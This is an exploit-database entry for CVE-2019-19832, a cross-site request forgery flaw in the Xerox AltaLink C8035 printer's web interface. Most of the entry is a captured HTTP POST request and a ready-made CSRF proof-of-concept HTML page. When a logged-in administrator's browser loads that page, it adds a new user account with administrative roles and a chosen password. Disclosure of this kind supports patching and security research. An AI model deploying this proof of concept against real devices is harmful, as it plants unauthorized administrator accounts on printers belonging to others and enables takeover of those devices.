# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : CVE-2019-19832

# Description :

A CSRF vulnerability was discovered in the Xerox AltaLink C8035 printer. Xerox AltaLink C8035
printers allow CSRF: a request to add a user is made from the Device User Database form and sent
to the xerox.set URI. This request was captured with a proxy, and a CSRF PoC HTML file was
prepared from it.
(The frmUserName value must be unique.)


# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: 158.162.130.37
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://158.162.130.37
Connection: close
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://158.162.130.37/dummypost/xerox.set" method="POST">
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="6,1,2" />
      <input type="hidden" name="limited" value="0" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="minLength" value="1" />
      <input type="hidden" name="maxLength" value="63" />
      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
      <input type="hidden" name="isNumberRequired" value="" />
      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
      <input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
      <input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
      <input type="hidden" name="frmNewPassword" value="Test1234!" />
      <input type="hidden" name="frmRetypePassword" value="Test1234!" />
      <input type="hidden" name="frmOldPassword" value="undefined" />
      <input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2019-12-17]  #